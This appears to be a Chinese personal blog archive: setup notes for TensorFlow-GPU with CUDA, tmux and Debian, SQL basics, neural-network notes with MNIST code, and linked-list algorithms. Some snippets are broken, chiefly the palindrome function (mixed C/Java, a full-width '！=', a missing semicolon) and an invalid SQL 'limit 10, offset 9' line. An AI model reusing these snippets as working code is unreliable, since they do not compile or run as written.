·如果在IDA中调试时，按下F9，出现Incompatible debugging server:protocol version is 19,expected 22类似错误，那么就是linux_sever的版本与IDA的版本不相符，可以重新下载一个IDA，然后将其linux_sever放入Ubuntu中运行查看版本，找到对应版本即可。

·pwntools下载到一半出错，检查下pip更新，下载出错多下载几次就可以了，玄学问题，估计就是网络原因。

TensorFlow+CUDA installation

2019-08-21T08:34:17.000Z

因为我的电脑TensorFlow-CPU版本感觉运算速度不足，于是乎开始安装TensorFlow-GPU版本。这期间经历了许多坑，也因为各种原因尝试了安装TensorFlow和CUDA的许多版本，因此打算记录下来，作为分享。

安装Anaconda Navigator

Anaconda Navigator下载地址：Anaconda
选择python3.7版本安装

安装过程比较简单，需要注意的是在install这一步前，需要勾选第一项，否则需要手添加环境变量

安装完成后，验证是否安装成功：
在命令窗口输入：

1	conda --version

如果显示了版本，即表明安装成功。
然后为了以后在Anaconda中安装其他插件和环境的方便，我们需要修改下载的镜像地址，我们打开刚刚安装好的Anaconda中的 Anaconda Prompt，然后输入:

1 2	conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/ conda config --set show_channel_urls yes

安装CUDA® Toolkit+cuDNN

安装TensorFlow-GPU前，需要查看其相应版本所需要的CUDA版本，相应的网址：
https://www.tensorflow.org/install/source_windows

版本	Python 版本	编译器	编译工具	cuDNN	CUDA
tensorflow_gpu-2.0.0-alpha0	2.7、3.3-3.6	GCC 4.8	Bazel 0.19.2	7.4.1以及更高版本	CUDA 10.0 (需要 410.x 或更高版本)
tensorflow_gpu-1.14.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.19.2	7.4.1以及更高版本	CUDA 10.0 (需要 410.x 或更高版本)
tensorflow_gpu-1.13.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.19.2	7.4	10.0
tensorflow_gpu-1.12.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.15.0	7	9
tensorflow_gpu-1.11.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.15.0	7	9
tensorflow_gpu-1.10.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.15.0	7	9
tensorflow_gpu-1.9.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.11.0	7	9
tensorflow_gpu-1.8.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.10.0	7	9
tensorflow_gpu-1.7.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.9.0	7	9
tensorflow_gpu-1.6.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.9.0	7	9
tensorflow_gpu-1.5.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.8.0	7	9
tensorflow_gpu-1.4.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.5.4	6	8
tensorflow_gpu-1.3.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.4.5	6	8
tensorflow_gpu-1.2.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.4.5	5.1	8
tensorflow_gpu-1.1.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.4.2	5.1	8
tensorflow_gpu-1.0.0	2.7、3.3-3.6	GCC 4.8	Bazel 0.4.2	5.1	8

然后我们需要查看NVIDIA驱动版本，才能安装合适的CUDA版本。在C:\Program Files\NVIDIA Corporation\NVSMI目录下，打开命令行窗口，执行nvidia-smi.exe：

如果电脑上没有NVSMI文件夹和nvidia-smi.exe文件，可以参照这里：
Windows NVIDIA Corporation下没有NVSMI文件夹解决方法
然后需要看CUDA对应的NVIDIA驱动版本，这里有一个对照表，参照表来安装相应的CUDA：

这个网址对应了官方的版本要求说明：https://docs.nvidia.com/cuda/cuda-toolkit-release-notes/index.html
确定好了需要安装的CUDA和cuDNN版本后，在以下网址下载CUDA和cuDNN:
CUDA：https://developer.nvidia.com/cuda-toolkit-archive
cuDNN：https://developer.nvidia.com/cudnn
下载cuDNN需要NVIDIA账号，注册一个即可。
下载完成后，开始安装CUDA，打开下载好的安装程序，刚开始的安装程序临时存放位置，默认就好：

然后会检测系统兼容性，有些显卡是不支持GPU的，自己需要先查清楚。下一步接受协议，然后选择安装模式，选择自定义模式，程序默认的精简模式应该可以理解为安装所有东西，其中包括VS以及显卡驱动，所以我选择的是自定义模式。在自定义模式中，如果电脑上有VS，那么就去掉VS的安装；另外Driver Component和NVIDIA GeForce Experience也不用勾选。

然后会让你选择安装路径，建议C盘空间足够的同学就直接按照默认路径在C盘中安装了，安装在其他盘有可能出问题。
安装完成后，还需要配置环境变量。系统中会多出两个环境变量：

然后添加如下环境变量：

CUDA_SDK_PATH = C:\ProgramData\NVIDIA Corporation\CUDA Samples\v9.0(这是默认安装位置的路径，如果自己路径设置安装成功的话就用自己的路径)

CUDA_LIB_PATH = %CUDA_PATH%\lib\x64 

CUDA_BIN_PATH = %CUDA_PATH%\bin 

CUDA_SDK_BIN_PATH = %CUDA_SDK_PATH%\bin\win64 

CUDA_SDK_LIB_PATH = %CUDA_SDK_PATH%\common\lib\x64

添加完之后CUDA就算安装完成了。检验是否安装成功可以到C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v9.0\extras\demo_suite(这是默认路径)中分别执行：

1 2	bandwidthTest.exe deviceQuery.exe

如果分别返回：

则表示CUDA安装成功。接下来需要解压下载好的cuDNN，将里面的bin、include、lib/x64中的文件分别拷到安装好的CUDA文件夹里对应的bin、include、lib/x64文件夹中。至此就安装好了CUDA和对应的cuDNN。

切换CUDA和cuDNN版本

如果安装了错误的CUDA版本或者在之后需要更换CUDA和cuDNN相应的版本，其实方法比较简单，还是在CUDA和cuDNN的官网下载相应的版本，按照上文的方法安装后，只需要将相应环境变量（CUDA_SDK_PATH和CUDA_PATH）修改为对应的版本即可。

安装TensorFlow-GPU

我们选择在Anaconda上安装TensorFlow-GPU，因为Anaconda可以独立的配置多个python环境，而互不影响，因此想换想改成其他版本都十分便捷。
首先通过

1	conda create -n tf python=3.6

创建一个专门用于TensorFlow的环境，然后

1 2	activate tf #进入tensorflow环境 deactivate #退出tensorflow环境

进入这个环境。为了保证安装没有什么问题，建议更新pip和setuptool工具

1 2	python -m pip install --upgrade pip pip install -–upgrade setuptools

然后就可以安装TensorFlow了：

1
2
3

pip install tensorflow-gpu  # stable
pip install tf-nightly-gpu  # preview
pip install tensorflow-gpu==2.0.0-beta1  #tensorflow2.0

安装完成后，进入python解释器，导入TensorFlow，如果导入成功即安装成功。

将Anaconda的TensorFlow环境导入到PyCharm

现在TensorFlow的环境已经搭好了，为了方便快捷的码代码，建议可以将Anaconda的TensorFlow环境导入到PyCharm（虽然Anaconda下的spider也可以用，但是建议PyCharm）。
打开PyCharm，在File->Setting中搜索Project Interpreter:

选择Add Local

然后添加刚刚建立的TensorFlow的环境的python.exe的地址：\Anaconda\envs\tf\python.exe。然后OK、Apply即可。

Basic of SQL

2019-07-19T11:21:02.000Z

SQL基础总结

SQL语言分类

1、DML（Data Manipulation Language）:数据操纵语句，用于添加、删除、修改、查询数据库记录，并检查数据完整性。

INSERT：添加数据到数据库中
UPDATE：修改数据库中的数据
DELETE：删除数据库中的数据
SELECT：选择（查询）数据

2、DDL（Data Definition Language）:数据定义语句，用于库和表的创建、修改、删除。

CREATE TABLE：创建数据库表
ALTER TABLE：更改表结构、添加、删除、修改列长度
DROP TABLE：删除表

3、DCL（Data Control Language）:数据控制语句，用于定义用户的访问权限和安全级别。

COMMIT：提交事务处理
ROLLBACK：事务处理回退
SAVEPOINT：设置保存点
LOCK：对数据库的特定部分进行锁定

数据查询

SELECT

1 2	SELECT *\|{[DISTINCT] column\|expression [alias],...} FROM table;

SELECT：标识选择哪些列
FROM：标识从哪个表中选择

列的别名有三种方式，例子如下：

SELECT last_name AS name, commission_pct comm
FROM employees;

SELECT last_name "Name", salary*12  
FROM employees;

SELECT commission_pct comm
FROM employees;

DESCRIBE

查询表结构：

1	DESC[RIBE] tablename;

WHERE

where子句用于对查询的数据进行过滤：

1
2
3

SELECT    *|{[DISTINCT] column|expression [alias],...}
FROM    table  
[WHERE    condition(s)];

WHERE子句紧随FROM子句，除了可以用>\<\!=等常用的比较运算符外，还可以使用下列操作符进行数据过滤：

操作符	含义
BETWEEN…AND…	在两个值之间（包含边界）
IN(set)	等于值列表中的一个
LIKE	模糊查询
IS NULL	空值

PS:WHERE子句中不能使用别名，不能使用组函数

ORDER BY

子句order by用于排序
asc:升序
desc:降序

SELECT XXX FROM XXX
ORDER BY XXX 

SELECT XXX FROM XXX
ORDER BY XXX DESC

/*多个列排序，分主次，在前的为主*/
SELECT XXX FROM XXX
ORDER BY XXX DESC，XXX

组函数

组函数作用于一组数据，并对一组数据返回一个值。其类型有：

AVG()
COUNT()
MAX()
MIN()
SUM()

GROUP BY

GROUP BY子句将表中的数据分成若干组

SELECT column, group_function(column)  
FROM table
[WHERE condition]
[GROUP BY group_by_expression]  
[ORDER BY column];

HAVING

SELECT column, group_function(column)  
FROM table
[WHERE condition]
[GROUP BY group_by_expression] 
[HAVING group_condition] 
[ORDER BY column];

使用HAVING子句的几个条件：

行已经被分组
使用了组函数
满足HAVING子句中条件的分组将被显示

JOIN ON

多表连接，其可以有几种分类：
内连接：[INNER] join on
外连接：
·左外连接：left [outer] join on
·右外连接：right [outer] join on

常见函数

字符函数

LOWER  UPPER

CONCAT  SUBSTR  LENGTH  INSTR
LPAD | RPAD  TRIM  REPLACE

数字函数

1
2
3

ROUND: 四舍五入
TRUNCATE:截断
MOD: 求余

日期函数

1
2
3

now()：获取当前日期
str_to_date: 将日期格式的字符转换成指定格式的日期
date_format:将日期转换成字符

序号	格式符	功能
1	%Y	四位的年份
2	%y	2位的年份
3	%m	月份(01,02…11,12)
4	%c	月份（1,2,…11,12）
5	%d	日（01,02,…）
6	%H	小时（24小时制）
7	%h	小时（12小时制）
8	%i	分钟（00,01…59）
9	%s	秒（00,01,…59）

CASE表达式

1
2
3

CASE expr WHEN comparison_expr1 THEN return_expr1  [WHEN comparison_expr2 THEN return_expr2  WHEN comparison_exprn THEN return_exprn
ELSE else_expr]
END

子查询

子查询是出现在其他语句内部的select语句。
单行子查询使用单行比较操作符；
多行子查询使用多行比较操作符；

多行子查询的比较操作符

操作符	含义
IN/NOT IN	等于列表中的任意一个
ANY SOME	和子查询返回的某一个值比较
ALL	和子查询返回的所有值比较

创建和管理表

CREATE TABLE

1 2	CREATE TABLE [schema.]table (column datatype [DEFAULT expr][, ...]);

还可以使用子查询来创建表、复制现有表

ALTER TABLE

使用 ALTER TABLE 语句可以实现：
·向已有的表中添加列（ADD）
·修改现有表中的列（MODIFY）
·删除现有表中的列（DROP）
·重命名现有表中的列（CHANGE）

删除表

DROP:删除数据和结够，不能回滚
TRUNCATE TABLE:清空表中所有的数据
DELETE:删除数据，可以回滚，在commit后才真正删除

RENAME

1 2	ALTER table dept RENAME TO detail_dept;

数据类型

数值类型

分为整型、小数、位类型

字符类型

分为char和varchar、binary和varbinary、enum和set类型

日期类型

略

约束和分页

约束

六种约束：

NOT NULL 非空约束，规定某个字段不能为空
UNIQUE唯一约束，规定某个字段在整个表中是唯一的
PRIMARY KEY 主键(非空且唯一)
FOREIGN KEY 外键
CHECK检查约束
DEFAULT默认值

分页

/*9：从第几条数据的下一条数据开始取，10：取几条数据*/
select * from employees limit 9, 10;
select * from employees limit 10, offset 9;

/*pageSize:每页显示多少条数据，pageNumber:页码*/
/*返回第pageNumber页 每条页数，为pageSize 的sql语句为：
select * from xxx limit (pageNmuber - 1)*pageSize, pageSize;*/

/*返回第5页，每页数据为20条的数据*/
select * from employees limit 80, 20;

事务

事务：事务由单独单元的一个或多个SQL语句组成，在这个单元中，每个MySQL语句是相互依赖的。而整个单独单元作为一个不可分割的整体，如果单元中某条SQL语句一旦执行失败或产生错误，整个单元将会回滚。所有受到影响的数据将返回到事物开始以前的状态；如果单元中的所有SQL语句均执行成功，则事物被顺利执行。

tmux+oh-my-tmux

2019-03-13T11:17:39.000Z

tmux的官方介绍：tmux is a terminal multiplexer: it enables a number of terminals to be created, accessed, and controlled from a single screen. tmux may be detached from a screen and continue running in the background, then later reattached. 总之，tmux可以使你的终端使用体验有极大的提升，还不赶紧来试试！

安装使用

首先给出githuib地址：tmux
各个系统下的安装命令：

brew install tmux       # OSX
pacman -S tmux          # archlinux
apt-get install tmux    # Ubuntu
yum install tmux        # Centos

安装完成后，赶紧试试tmux吧：

1 2	tmux #默认名字启用tmux tmux new -s name #指定session的名字

在Tmux Session中，是tmux的前缀键，所有tmux快捷键都需要先按前缀键。它的默认值是Ctrl+b。
比如我们想做到把终端分成两半，如下图：

使用如下命令：

1	% #即：先按下ctrl+b(默认前缀)，再按下shift+5(%)

是不是很舒服？赶紧试试其他命令吧！
tmux更多命令详见：Tmux使用手册

安装Oh My Tmux

虽然安装了tmux，但是是不是感觉ctrl + b不太好按？我们可以更改tmux的配置文件来修改默认前置，但在这篇博客里不会分享，喜欢折腾的玩家请自行google解决。在这里我介绍一个已经配置好的tmux：oh my tmux。这里是它的github链接：Oh My Tmux。可以看到这个tmux界面很炫酷有木有。我们赶紧来试试吧！

安装命令：

cd
git clone https://github.com/gpakosz/.tmux.git
ln -s -f .tmux/.tmux.conf
cp .tmux/.tmux.conf.local .

重启你的终端，在使用tmux，是不是已经看到效果了？当然，如果你不满足于此，可以通过查阅官方文档来自己打造一个适合自己的tmux配置。另外tmux配合zsh也可以让你的终端看起来更漂亮，tmux还可以与vim结合起来做一个IDE。多去尝试吧！

Deep Learning(1)

2019-02-10T14:02:00.000Z

Perceptrons

输入x1, x2…是二进制输入，产生一个二进制输出。
感知器可以用作一种决策器。
感知器可以当作NAND门。

1 2	output= 0 if w⋅x+b≤0 1 if w⋅x+b>0

权重或者偏差（阈值）轻微的变动会引起结果的很大的变化。
假设我们采用感知器（Perceptrons）网络中的所有权重和偏差，并将它们乘以正常数c，c> 0。神经网络的行为不会更改。

Sigmoid neurons

输入x1, x2…在0~1之间，产生一个在0~1之间的输出。
sigmoid函数：σ(z)≡1/1+e^(−z), z ≡ wx + b。

1 2	output = 1/(1+exp(−∑jwjxj−b)) Δoutput ≈ (∑j∂output/∂wj)Δwj+(∂output/∂b)Δb

权重或者偏差（阈值）轻微的变动会引起结果较小的变化。
假设我们采用Sigmoid神经元网络中的所有权重和偏差，并将它们乘以正常数c，c> 0。当c→∞时，神经网络的行为就是感知器网络的行为。

The architecture of neural networks

输入层、输入神经元
输出层、输出神经元
隐层、隐层神经元
前馈神经网络：前一层的输出作用于后一层的输入（没有回路）
递归神经网络
输入和输出神经元的设计通常比较简单。比如一个64x64的灰度图像是否是“9”，则输入神经元有4096个，输出神经元只有一个

A simple network to classify handwritten digits

启发式方法识别数字（所以直接识别0-9更容易而不是以4位二进制的方式来识别）

Learning with gradient descent

成本函数：C(w,b) ≡ 1/2n(∑x∥y(x)−a∥^2)，a是输出向量
成本函数值越接近0，说明输出值和拟合的输出值越接近
ΔC ≈ (∂C/∂v1)Δv1 + (∂C/∂v2)Δv2, Δv ≡ (Δv1,…,Δvm)^T, 梯度向量∇C ≡ (∂C/∂v1,…,∂C/∂vm)^T
所以 ΔC ≈ ∇C⋅Δv，令Δv = −η∇C，则 ΔC ≈ −η∇C⋅∇C = −η∥∇C∥^2，所以ΔC≤0，则梯度下降ΔC
更新规则：通过 v→v′=v−η∇C 来更新v（位置）值，η：学习率
可以证明，令 ∥Δv∥=ϵ 当 Δv = −η∇C 时，C下降的最大
利用梯度下降，找出最合适的w和b使成本函数值最小：使用权值和偏差代替上式的v，也就是说v有两个分量w、b，那么更新规则变为：

1 2	wk→w′k=wk−η∂C/∂wk bl→b′l=bl−η∂C/∂bl

请注意，此成本函数的形式为C = 1/n(ΣxCx)，也就是说，它是针对个别培训样例的平均成本为 Cx ≡ ∥y（x）-a∥^2。实际上，为了计算梯度∇C，我们需要分别为每个训练输入x计算梯度∇Cx，然后对它们求平均值，∇C=1/nΣx∇Cx。那么当训练的输入非常多的时候，会造成神经网络的学习速度低下

随机梯度下降：其思想是通过计算随机选择的训练输入的小样本的∇Cx来估计梯度∇C。通过对这个小样本进行平均，我们可以快速得到真实梯度∇C的良好估计，这有助于加快梯度下降，从而学习。即从所有样本中取一部分样本(mini-batch)进行输入，并近似的认为
[(∑m,j=1)∇CXj]/m ≈ (∑x∇Cx)/n = ∇C
我们可以通过计算随机选择的小批量的梯度来估计总梯度。

1 2	wk→w′k=wk−η/m(∑j∂CXj/∂wk) bl→b′l=bl−η/m(∑j∂CXj/∂bl)

然后选择另一个随机选择的小批量进行训练。直到我们用完样本的输入，就说完成了一轮（epochs）训练。那时我们重新开始一论新的训练

增量学习：将小批量的大小设定为1。那么输入一个x，就更新权重和偏差。然后重新选择另一个输入，更新权重和偏差。

Implementing our network to classify digits

"""
network.py
~~~~~~~~~~

A module to implement the stochastic gradient descent learning
algorithm for a feedforward neural network.  Gradients are calculated
using backpropagation.  Note that I have focused on making the code
simple, easily readable, and easily modifiable.  It is not optimized,
and omits many desirable features.
"""

#### Libraries
# Standard library
import random

# Third-party libraries
import numpy as np

class Network(object):

    def __init__(self, sizes):
        """The list ``sizes`` contains the number of neurons in the
        respective layers of the network.  For example, if the list
        was [2, 3, 1] then it would be a three-layer network, with the
        first layer containing 2 neurons, the second layer 3 neurons,
        and the third layer 1 neuron.  The biases and weights for the
        network are initialized randomly, using a Gaussian
        distribution with mean 0, and variance 1.  Note that the first
        layer is assumed to be an input layer, and by convention we
        won't set any biases for those neurons, since biases are only
        ever used in computing the outputs from later layers."""
        self.num_layers = len(sizes)
        self.sizes = sizes
        self.biases = [np.random.randn(y, 1) for y in sizes[1:]]
        self.weights = [np.random.randn(y, x)
                        for x, y in zip(sizes[:-1], sizes[1:])]

    def feedforward(self, a):
        """Return the output of the network if ``a`` is input."""
        for b, w in zip(self.biases, self.weights):
            a = sigmoid(np.dot(w, a)+b)
        return a

    def SGD(self, training_data, epochs, mini_batch_size, eta,
            test_data=None):
        """Train the neural network using mini-batch stochastic
        gradient descent.  The ``training_data`` is a list of tuples
        ``(x, y)`` representing the training inputs and the desired
        outputs.  The other non-optional parameters are
        self-explanatory.  If ``test_data`` is provided then the
        network will be evaluated against the test data after each
        epoch, and partial progress printed out.  This is useful for
        tracking progress, but slows things down substantially."""
        if test_data: n_test = len(test_data)
        n = len(training_data)
        for j in xrange(epochs):
            random.shuffle(training_data)
            mini_batches = [
                training_data[k:k+mini_batch_size]
                for k in xrange(0, n, mini_batch_size)]
            for mini_batch in mini_batches:
                self.update_mini_batch(mini_batch, eta)
            if test_data:
                print "Epoch {0}: {1} / {2}".format(
                    j, self.evaluate(test_data), n_test)
            else:
                print "Epoch {0} complete".format(j)

    def update_mini_batch(self, mini_batch, eta):
        """Update the network's weights and biases by applying
        gradient descent using backpropagation to a single mini batch.
        The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta``
        is the learning rate."""
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        for x, y in mini_batch:
            delta_nabla_b, delta_nabla_w = self.backprop(x, y)
            nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]
            nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]
        self.weights = [w-(eta/len(mini_batch))*nw
                        for w, nw in zip(self.weights, nabla_w)]
        self.biases = [b-(eta/len(mini_batch))*nb
                       for b, nb in zip(self.biases, nabla_b)]

    def backprop(self, x, y):
        """Return a tuple ``(nabla_b, nabla_w)`` representing the
        gradient for the cost function C_x.  ``nabla_b`` and
        ``nabla_w`` are layer-by-layer lists of numpy arrays, similar
        to ``self.biases`` and ``self.weights``."""
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        # feedforward
        activation = x
        activations = [x] # list to store all the activations, layer by layer
        zs = [] # list to store all the z vectors, layer by layer
        for b, w in zip(self.biases, self.weights):
            z = np.dot(w, activation)+b
            zs.append(z)
            activation = sigmoid(z)
            activations.append(activation)
        # backward pass
        delta = self.cost_derivative(activations[-1], y) * \
            sigmoid_prime(zs[-1])
        nabla_b[-1] = delta
        nabla_w[-1] = np.dot(delta, activations[-2].transpose())
        # Note that the variable l in the loop below is used a little
        # differently to the notation in Chapter 2 of the book.  Here,
        # l = 1 means the last layer of neurons, l = 2 is the
        # second-last layer, and so on.  It's a renumbering of the
        # scheme in the book, used here to take advantage of the fact
        # that Python can use negative indices in lists.
        for l in xrange(2, self.num_layers):
            z = zs[-l]
            sp = sigmoid_prime(z)
            delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
            nabla_b[-l] = delta
            nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
        return (nabla_b, nabla_w)

    def evaluate(self, test_data):
        """Return the number of test inputs for which the neural
        network outputs the correct result. Note that the neural
        network's output is assumed to be the index of whichever
        neuron in the final layer has the highest activation."""
        test_results = [(np.argmax(self.feedforward(x)), y)
                        for (x, y) in test_data]
        return sum(int(x == y) for (x, y) in test_results)

    def cost_derivative(self, output_activations, y):
        """Return the vector of partial derivatives \partial C_x /
        \partial a for the output activations."""
        return (output_activations-y)

#### Miscellaneous functions
def sigmoid(z):
    """The sigmoid function."""
    return 1.0/(1.0+np.exp(-z))

def sigmoid_prime(z):
    """Derivative of the sigmoid function."""
    return sigmoid(z)*(1-sigmoid(z))

"""
mnist_loader
~~~~~~~~~~~~

A library to load the MNIST image data.  For details of the data
structures that are returned, see the doc strings for ``load_data``
and ``load_data_wrapper``.  In practice, ``load_data_wrapper`` is the
function usually called by our neural network code.
"""

#### Libraries
# Standard library
import cPickle
import gzip

# Third-party libraries
import numpy as np

def load_data():
    """Return the MNIST data as a tuple containing the training data,
    the validation data, and the test data.

    The ``training_data`` is returned as a tuple with two entries.
    The first entry contains the actual training images.  This is a
    numpy ndarray with 50,000 entries.  Each entry is, in turn, a
    numpy ndarray with 784 values, representing the 28 * 28 = 784
    pixels in a single MNIST image.

    The second entry in the ``training_data`` tuple is a numpy ndarray
    containing 50,000 entries.  Those entries are just the digit
    values (0...9) for the corresponding images contained in the first
    entry of the tuple.

    The ``validation_data`` and ``test_data`` are similar, except
    each contains only 10,000 images.

    This is a nice data format, but for use in neural networks it's
    helpful to modify the format of the ``training_data`` a little.
    That's done in the wrapper function ``load_data_wrapper()``, see
    below.
    """
    f = gzip.open('../data/mnist.pkl.gz', 'rb')
    training_data, validation_data, test_data = cPickle.load(f)
    f.close()
    return (training_data, validation_data, test_data)

def load_data_wrapper():
    """Return a tuple containing ``(training_data, validation_data,
    test_data)``. Based on ``load_data``, but the format is more
    convenient for use in our implementation of neural networks.

    In particular, ``training_data`` is a list containing 50,000
    2-tuples ``(x, y)``.  ``x`` is a 784-dimensional numpy.ndarray
    containing the input image.  ``y`` is a 10-dimensional
    numpy.ndarray representing the unit vector corresponding to the
    correct digit for ``x``.

    ``validation_data`` and ``test_data`` are lists containing 10,000
    2-tuples ``(x, y)``.  In each case, ``x`` is a 784-dimensional
    numpy.ndarry containing the input image, and ``y`` is the
    corresponding classification, i.e., the digit values (integers)
    corresponding to ``x``.

    Obviously, this means we're using slightly different formats for
    the training data and the validation / test data.  These formats
    turn out to be the most convenient for use in our neural network
    code."""
    tr_d, va_d, te_d = load_data()
    training_inputs = [np.reshape(x, (784, 1)) for x in tr_d[0]]
    training_results = [vectorized_result(y) for y in tr_d[1]]
    training_data = zip(training_inputs, training_results)
    validation_inputs = [np.reshape(x, (784, 1)) for x in va_d[0]]
    validation_data = zip(validation_inputs, va_d[1])
    test_inputs = [np.reshape(x, (784, 1)) for x in te_d[0]]
    test_data = zip(test_inputs, te_d[1])
    return (training_data, validation_data, test_data)

def vectorized_result(j):
    """Return a 10-dimensional unit vector with a 1.0 in the jth
    position and zeroes elsewhere.  This is used to convert a digit
    (0...9) into a corresponding desired output from the neural
    network."""
    e = np.zeros((10, 1))
    e[j] = 1.0
    return e

Install&beautify Debian 64-bit on computer

2019-01-31T11:18:35.000Z

制作U盘启动盘

首先使用格式化工具（我使用的是Diskgenius）将U盘彻底格式化，使用UltraISO将debian系统烧录进U盘

划分硬盘空间

使用Diskgenius将硬盘划分出一个50.86G的未分配空间用于Debian系统的安装

在BIOS设置U盘启动优先

在电脑开机的时候进入BIOS界面，将开机启动选项选择到EFI启动优先，并将安全选项中security boot关闭，保存选项后重启电脑

安装Debian 9.7

进入安装界面，选择图像化安装

语言一路默认

主机名默认，设置root密码和用户密码

磁盘分区，选择划分出来的的空闲空间

选择Automatically partion the free space

选择All files in one partition

等待安装，出现配置network时，选择yes

我选择了科大源

等待安装完成，电脑重新启动时拔出U盘，进入Debian系统

美化系统

在这里超级推荐一个网站：
https://www.gnome-look.org/
我是参照一篇博主的文章对Debian系统进行主题美化，MacX样式，
以下是链接：
https://blog.csdn.net/zyqblog/article/details/80152016

5 LinkListFun()

2018-10-14T11:10:27.000Z

Reverse LinkList

描述：反转一个单链表

迭代

/***** Definition for linklist *****/
/* typedef struct LNode{
Elemtype data;
struct LNode *next;
 * }LNode *linklist
*/
class Solution {
    public LNode reverseList(linklist head) {
        linklist newhead=null;
        linklist now;
        while(head!=null){
            now=head;         //取头
            head=head.next;   //更新原链头
            now.next=newhead; //插入新链
            newhead=now;      //更新新链头
        }
        return newhead;
    }
}

递归

class Solution {
    public LNode reverseList(linklist head) {
         if(head==null||head.next==null)return head;
         LNode newhead=reverseList(head.next);
         head.next.next=head;
         head.next=null;
         return newhead;
    }
}

LinkedList Cycle

描述：判断一个链表是否有环

/**
 * Definition for singly-linked list.
 * struct ListNode {
 *     int val;
 *     ListNode *next;
 *     ListNode(int x) : val(x), next(NULL) {}
 * };
 */
// 时间复杂度O(n) 空间复杂度O(1) 
class Solution { 
public: 
bool hasCycle(ListNode *head) { 
// 设计两个指针，一快一慢，快指针与慢指针相遇则有环。
ListNode *slow = head, *fast = head; 
while (fast && fast->next) { 
slow = slow->next; 
fast = fast->next->next; 
if (slow == fast) return true; 
} 
return false; 
} 
};

Merge Two Sorted Lists

描述：将两个有序链表合并为一个新的有序链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。

// 时间复杂度O(min(m,n)) 空间复杂度O(1) 
class Solution { 
public: ListNode *mergeTwoLists(ListNode *l1, ListNode *l2) { 
if (l1 == nullptr) return l2; 
if (l2 == nullptr) return l1; 
ListNode dummy(-1); //头结点
ListNode *p = &dummy; 
for (; l1 != nullptr && l2 != nullptr; p = p->next) { 
if (l1->val > l2->val) { 
p->next = l2; 
l2 = l2->next; 
} 
else { 
p->next = l1; 
l1 = l1->next; 
} 
} 
p->next = l1 != nullptr ? l1 : l2; 
return dummy.next; 
} 
};

Remove Nth Node From End of List

描述：给定一个链表，删除链表的倒数第 n 个节点，并且返回链表的头结点。

//设两个指针p,q，让q先走n步，然后p,q一起走，直到q走到尾结点，删除p->next即可
// 时间复杂度O(n) 空间复杂度O(1) 
class Solution { 
public: ListNode *removeNthFromEnd(ListNode *head, int n) { 
ListNode dummy{-1, head}; //头结点
ListNode *p = &dummy, *q = &dummy; 
for (int i = 0; i < n; i++) // q先走n步 
q = q->next; 
while(q->next) { // 一起走
p = p->next; 
q = q->next; 
} 
ListNode *tmp = p->next; 
p->next = p->next->next; 
delete tmp; return dummy.next; 
} 
};

MiddleNode of List

描述：给定一个带有头结点head的非空单链表，返回链表的中间结点。如果，有两个中间结点，则返回第二个中间节点。

//同样使用快慢两个指针，当用慢指针slow遍历列表时，让另一个指针fast的速度是slow的二倍，则当快指针到结尾时，slow指针位于中间。
//初始位置都为head时，当fast指向最终的null时，slow也就达到了要求。
class Solution {
public ListNode middleNode(ListNode head) {
ListNode slow = head, fast = head;
while((fast != null) && (fast.next != null)) {
slow = slow.next;
fast = fast.next.next;
}
return slow;
}
}

Palindrome

2018-10-14T01:38:47.000Z

在学习链表时，遇到的一个有意思的问题，记录下思路和算法。

思路

使用快慢两个指针找到链表中点，快指针每次移动两个结点，慢指针每次移动一个结点。
- 如果结点是奇数，中点位置不需要矫正
- 如果结点是偶数，使慢指针前进一个结点指向下中位数
在慢指针移动的时候，同时修改其next指针，使链表前半部分反序。
最后比较中点两侧的链表是否相等。

时间复杂度：O(n)
空间复杂度：O(n)

完整代码

/***** Definition for linklist *****/
/* typedef struct LNode{
Elemtype data;
struct LNode *next;
 * }LNode *linklist
*/
bool isPalindorme(LNode head) {
if (head == null || head->next == null) return true;

LNode prev = null;
LNode slow = head;
LNode fast = head;

//实现链表前半部分反序排列
while (fast != null && fast->next != null) {
fast = fast->next->next;
LNode next = slow->next;
slow->next = prev;
prev = slow;
slow = next;
}

//根据fast指针判断链表奇偶
if (fast ！= null) {
slow = slow->next;
}

//比较链表前半段和后半段是否相同
while (slow != null) {
if (slow->data != prev->data) {
return false;
}
slow = slow->next;
prev = prev->next
}

return true;
}

DataStructure

2018-09-26T14:49:27.000Z

绪论

基本概念和术语

数据：所有能输入到计算机中并被计算机程序处理的符号总称
数据元素：数据的基本单位，一个数据元素可由若干个数据项组成
数据项：是数据的不可分割的最小单位
数据对象：是性质相同的数据元素的集合，是数据的一个子集
数据结构：是相互之间存在的一种或多种特定关系的数据元素的集合（简单解释）

根据数据元素之间关系的不同特性，通常有下列4种基本结构：
1）集合
2）线性结构
3）树形结构
4）图状结构或网状结构

数据结构的形式定义为：数据结构是一个二元组

1	Data_Structure = (D,S)

其中：D是数据元素的有限集，S是D上关系的有限集。

数据的储存结构
顺序、链接、索引、散列

抽象数据类型（ADT）
和数据结构的形式定义相对应，抽象数据类型可用以下三元组表示

(D、S、P)

其中，D是数据对象，S是D上的关系集，P是对D的基本操作机集。
以如下格式定义抽象数据类型：

ADT抽象数据类型名{
数据对象：<数据对象的定义>
数据关系：<数据关系的定义>
基本操作：<基本操作的定义>
}ADT抽象数据类型名

